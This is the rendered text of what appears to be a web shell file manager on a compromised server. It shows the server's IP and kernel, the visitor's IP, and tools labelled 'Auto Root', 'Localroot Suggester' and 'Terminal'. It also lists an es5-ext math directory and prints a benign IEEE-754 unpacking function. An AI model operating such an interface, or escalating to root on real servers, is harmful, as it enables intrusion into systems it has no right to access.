Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.227.140.134
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
es5-ext /
math /
Delete
Unzip
Name
Size
Permission
Date
Action
acosh
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
asinh
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
atanh
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
cbrt
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
clz32
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
cosh
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
expm1
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
fround
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
hypot
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
imul
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
log10
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
log1p
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
log2
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
sign
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
sinh
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
tanh
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
trunc
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
_decimal-adjust.js
809
B
-rw-rw-r--
2022-08-30 11:49
_pack-ieee754.js
1.96
KB
-rw-rw-r--
2022-08-30 11:49
_unpack-ieee754.js
927
B
-rw-rw-r--
2022-08-30 11:49
ceil-10.js
70
B
-rw-rw-r--
2022-08-30 11:49
floor-10.js
71
B
-rw-rw-r--
2022-08-30 11:49
index.js
597
B
-rw-rw-r--
2022-08-30 11:49
round-10.js
71
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
/* eslint no-bitwise: "off" */ // Credit: https://github.com/paulmillr/es6-shim/ "use strict"; var pow = Math.pow; module.exports = function (bytes, ebits, fbits) { // Bytes to bits var bits = [], i, j, bit, str, bias, sign, e, fraction; for (i = bytes.length; i; i -= 1) { bit = bytes[i - 1]; for (j = 8; j; j -= 1) { bits.push(bit % 2 ? 1 : 0); bit >>= 1; } } bits.reverse(); str = bits.join(""); // Unpack sign, exponent, fraction bias = (1 << (ebits - 1)) - 1; sign = parseInt(str.substring(0, 1), 2) ? -1 : 1; e = parseInt(str.substring(1, 1 + ebits), 2); fraction = parseInt(str.substring(1 + ebits), 2); // Produce number if (e === (1 << ebits) - 1) return fraction === 0 ? sign * Infinity : NaN; if (e > 0) return sign * pow(2, e - bias) * (1 + fraction / pow(2, fbits)); if (fraction !== 0) return sign * pow(2, -(bias - 1)) * (fraction / pow(2, fbits)); return sign < 0 ? -0 : 0; };